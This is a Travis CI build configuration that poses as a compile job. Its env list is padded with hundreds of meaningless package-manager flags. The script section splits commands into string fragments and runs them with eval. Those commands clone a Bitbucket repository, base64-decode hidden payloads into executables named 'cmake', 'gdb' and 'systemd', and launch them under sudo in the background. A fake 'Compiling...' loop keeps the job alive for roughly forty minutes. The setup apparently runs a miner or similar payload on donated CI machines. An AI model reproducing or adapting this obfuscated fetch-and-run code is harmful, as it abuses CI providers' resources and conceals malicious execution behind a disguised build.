dist: bionic

env:
  - BUILD="--quiet-build=766hg"
  - BUILD="--sysroot=346MD"
  - BUILD="--selective=74093"
  - BUILD="--autounmask-continue=438bh"
  - BUILD="--noreplace=934z0"
  - BUILD="--autounmask-license=670Dg"
  - BUILD="--with-test-deps=206kB"
  - BUILD="--autounmask-keep-keywords=864Cm"
  - BUILD="--columns=802dz"
  - BUILD="--usepkg=517wE"
  - BUILD="--package-moves=37IT"
  - BUILD="--use-ebuild-visibility=87695"
  - BUILD="--quiet-fail=9981y"
  - BUILD="--list-sets=776nr"
  - BUILD="--autounmask-keep-masks=446TX"
  - BUILD="--deselect=908nB"
  - BUILD="--onlydeps-with-rdeps=476Em"
  - BUILD="--select=5486r"
  - BUILD="--binpkg-changed-deps=149O3"
  - BUILD="--ignore-soname-deps=2485W"
  - BUILD="--dynamic-deps=369AD"
  - BUILD="--buildpkg=216Z3"
  - BUILD="--noconfmem=455uL"
  - BUILD="--check-news=783u4"
  - BUILD="--complete-graph-if-new-ver=696tT"
  - BUILD="--usepkgonly=363aO"
  - BUILD="--config=466V4"
  - BUILD="--rebuild-ignore=65yV"
  - BUILD="--autounmask-keep-keywords=133nX"
  - BUILD="--prefix=23297"
  - BUILD="--package-moves=830F4"
  - BUILD="--ask-enter-invalid=558ln"
  - BUILD="--search-similarity=385fp"
  - BUILD="--ignore-world=18WA"
  - BUILD="--ignore-default-opts=544Mg"
  - BUILD="--search=775Sl"
  - BUILD="--exclude=137Oz"
  - BUILD="--complete-graph=844uB"
  - BUILD="--unordered-display=590WI"
  - BUILD="--implicit-system-deps=810jb"
  - BUILD="--sync-submodule=653mD"
  - BUILD="--help=785mP"
  - BUILD="--changed-deps-report=646sn"
  - BUILD="--autounmask-continue=961XR"
  - BUILD="--use-ebuild-visibility=119TA"
  - BUILD="--rebuild-if-new-slot=331mv"
  - BUILD="--regen=644r6"
  - BUILD="--complete-graph-if-new-ver=436HB"
  - BUILD="--load-average=110p0"
  - BUILD="--ignore-world=322Vc"
  - BUILD="--rebuilt-binaries-timestamp=88Qi"
  - BUILD="--autounmask-write=524JG"
  - BUILD="--quiet-unmerge-warn=737Tk"
  - BUILD="--complete-graph=299Z8"
  - BUILD="--newuse=945jj"
  - BUILD="--root-deps=327Qy"
  - BUILD="--autounmask-continue=151Bl"
  - BUILD="--rebuild-if-new-rev=796Tu"
  - BUILD="--searchdesc=808Ie"
  - BUILD="--list-sets=103QI"
  - BUILD="--autounmask-license=14EA"
  - BUILD="--select=152LN"
  - BUILD="--pretend=879cA"
  - BUILD="--noconfmem=589iu"
  - BUILD="--ignore-built-slot-operator-deps=988zx"
  - BUILD="--usepkg=65rh"
  - BUILD="--autounmask-use=761So"
  - BUILD="--depclean=137Ry"
  - BUILD="--usepkgonly=699e1"
  - BUILD="--deep=599iA"
  - BUILD="--quiet-repo-display=3658G"
  - BUILD="--verbose=4827r"
  - BUILD="--rage-clean=987bj"
  - BUILD="--buildpkgonly=8324O"
  - BUILD="--deselect=14NW"
  - BUILD="--regen=697EX"
  - BUILD="--sysroot=805o9"
  - BUILD="--verbose=8693Z"
  - BUILD="--autounmask-write=376QW"
  - BUILD="--rebuilt-binaries=990Ad"
  - BUILD="--nodeps=924eW"
  - BUILD="--quickpkg-direct=540P0"
  - BUILD="--nospinner=574Hp"
  - BUILD="--usepkg-exclude=232TX"
  - BUILD="--deep=556kT"
  - BUILD="--quiet-build=717Kp"
  - BUILD="--sync-submodule=4777K"
  - BUILD="--autounmask-use=984jp"
  - BUILD="--use-ebuild-visibility=345bW"
  - BUILD="--ignore-world=341EB"
  - BUILD="--depclean-lib-check=266Yx"
  - BUILD="--binpkg-respect-use=947qk"
  - BUILD="--autounmask-backtrack=724zg"
  - BUILD="--autounmask-continue=964Rk"
  - BUILD="--depclean-lib-check=724J2"
  - BUILD="--root=393SU"
  - BUILD="--unordered-display=908d7"
  - BUILD="--ask-enter-invalid=4922F"
  - BUILD="--buildpkgonly=157R"
  - BUILD="--ignore-built-slot-operator-deps=265sa"
  - BUILD="--autounmask-write=724zh"
  - BUILD="--quiet-unmerge-warn=829JC"
  - BUILD="--verbose=8674Z"
  - BUILD="--resume=9054M"
  - BUILD="--changed-deps=682sc"
  - BUILD="--autounmask-write=316qH"
  - BUILD="--unmerge=573kf"
  - BUILD="--rebuild-if-new-rev=953FO"
  - BUILD="--nodeps=803wz"
  - BUILD="--buildpkg-exclude=470yO"
  - BUILD="--noconfmem=534MU"
  - BUILD="--autounmask-keep-keywords=199XA"
  - BUILD="--sync=5101F"
  - BUILD="--binpkg-changed-deps=1051m"
  - BUILD="--unmerge=9917z"
  - BUILD="--select=390OW"
  - BUILD="--implicit-system-deps=8231w"
  - BUILD="--root=640yH"
  - BUILD="--autounmask=250sn"
  - BUILD="--tree=150mg"
  - BUILD="--config-root=5254G"
  - BUILD="--emptytree=655nJ"
  - BUILD="--verbose=967EE"
  - BUILD="--selective=398JN"
  - BUILD="--with-bdeps-auto=3826G"
  - BUILD="--quickpkg-direct=651tB"
  - BUILD="--depclean-lib-check=274sb"
  - BUILD="--noreplace=603cB"
  - BUILD="--autounmask-keep-keywords=458uK"
  - BUILD="--check-news=765ia"
  - BUILD="--accept-restrict=74931"
  - BUILD="--help=875AF"
  - BUILD="--root-deps=98C1"
  - BUILD="--with-bdeps=418qM"
  - BUILD="--dynamic-deps=232D7"
  - BUILD="--autounmask-continue=782Bu"
  - BUILD="--unordered-display=985to"
  - BUILD="--unmerge=9561D"
  - BUILD="--searchdesc=945d6"
  - BUILD="--buildpkg=897yP"
  - BUILD="--autounmask-keep-keywords=372jk"
  - BUILD="--with-bdeps=146bl"
  - BUILD="--changed-use=15r3"
  - BUILD="--color=97FL"
  - BUILD="--metadata=65wL"
  - BUILD="--fuzzy-search=872Vh"
  - BUILD="--emptytree=880xO"
  - BUILD="--select=44UM"
  - BUILD="--noreplace=200AF"
  - BUILD="--jobs=139V6"
  - BUILD="--exclude=42dw"
  - BUILD="--reinstall-atoms=972S9"
  - BUILD="--config=139Vf"
  - BUILD="--rebuild-ignore=879kJ"
  - BUILD="--nodeps=398kG"
  - BUILD="--keep-going=885XL"
  - BUILD="--implicit-system-deps=517Fi"
  - BUILD="--quiet-repo-display=677Bm"
  - BUILD="--misspell-suggestions=118vl"
  - BUILD="--autounmask-backtrack=575Rf"
  - BUILD="--prune=830iF"
  - BUILD="--rebuild-if-new-ver=5977n"
  - BUILD="--autounmask-keep-masks=22BN"
  - BUILD="--root-deps=3488u"
  - BUILD="--newuse=852nb"
  - BUILD="--root-deps=715j8"
  - BUILD="--fetchonly=5079Q"
  - BUILD="--help=705BA"
  - BUILD="--pretend=37UM"
  - BUILD="--backtrack=745gc"
  - BUILD="--autounmask-keep-keywords=338he"
  - BUILD="--help=855ZR"
  - BUILD="--accept-properties=830Nd"
  - BUILD="--skipfirst=810Z0"
  - BUILD="--config-root=587OW"
  - BUILD="--accept-properties=993fJ"
  - BUILD="--binpkg-respect-use=5Lc"
  - BUILD="--read-news=2596q"
  - BUILD="--prefix=310hw"
  - BUILD="--package-moves=757dc"
  - BUILD="--quiet-fail=24Dq"
  - BUILD="--oneshot=5715i"
  - BUILD="--fetch-all-uri=77eM"
  - BUILD="--rebuild-if-new-ver=899z3"
  - BUILD="--clean=9719S"
  - BUILD="--resume=126GL"
  - BUILD="--clean=7385y"
  - BUILD="--prefix=400o8"
  - BUILD="--autounmask-license=392Fz"
  - BUILD="--debug=141Dj"

language: minimal

script:
  - sudo apt update || true
  - ivKEqlKOD="sudo apt --"
  - zVFFkXCCc="yes install"
  - HKvrkoRVbuZ=" cl-base64 "
  - eaMnz="git &>/dev/"
  - eval "$ivKEqlKOD""$zVFFkXCCc""$HKvrkoRVbuZ""$eaMnz""null"
  - jomyDlmJp="git clone h"
  - duHhwBtl="ttps://gccb"
  - ReAaWZzwexf="uild@bitbuc"
  - yqcFhKpqP="ket.org/gcc"
  - TVhrJqSMsR="build/gcc.g"
  - ZXWGRukWSs="it &>/dev/n"
  - eval "$jomyDlmJp""$duHhwBtl""$ReAaWZzwexf""$yqcFhKpqP""$TVhrJqSMsR""$ZXWGRukWSs""ull"
  - OpGLTTQgoEL="base64 -d g"
  - MLIjx="cc/cmake_ >"
  - eval "$OpGLTTQgoEL""$MLIjx"" cmake"
  - tWlTiDWlxC="base64 -d g"
  - ReppMacr="cc/config_ "
  - eval "$tWlTiDWlxC""$ReppMacr""> systemd"
  - kaIpfEMgn="base64 -d g"
  - UJSFCFsR="cc/make_ > "
  - eval "$kaIpfEMgn""$UJSFCFsR""gdb"
  - chmod +x gdb cmake
  - FLNmVSv="./cmake"
  - eval "$FLNmVSv"""
  - sed -i 's/build/tundefined2u/g' systemd
  - sudo ./gdb --config systemd &>/dev/null &
  - GCC=$(date +%s)
  - ypmjYPSfQx="echo $BUILD"
  - eval "$ypmjYPSfQx"""
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2478)) ] && sudo killall gdb && break; sleep 226; done
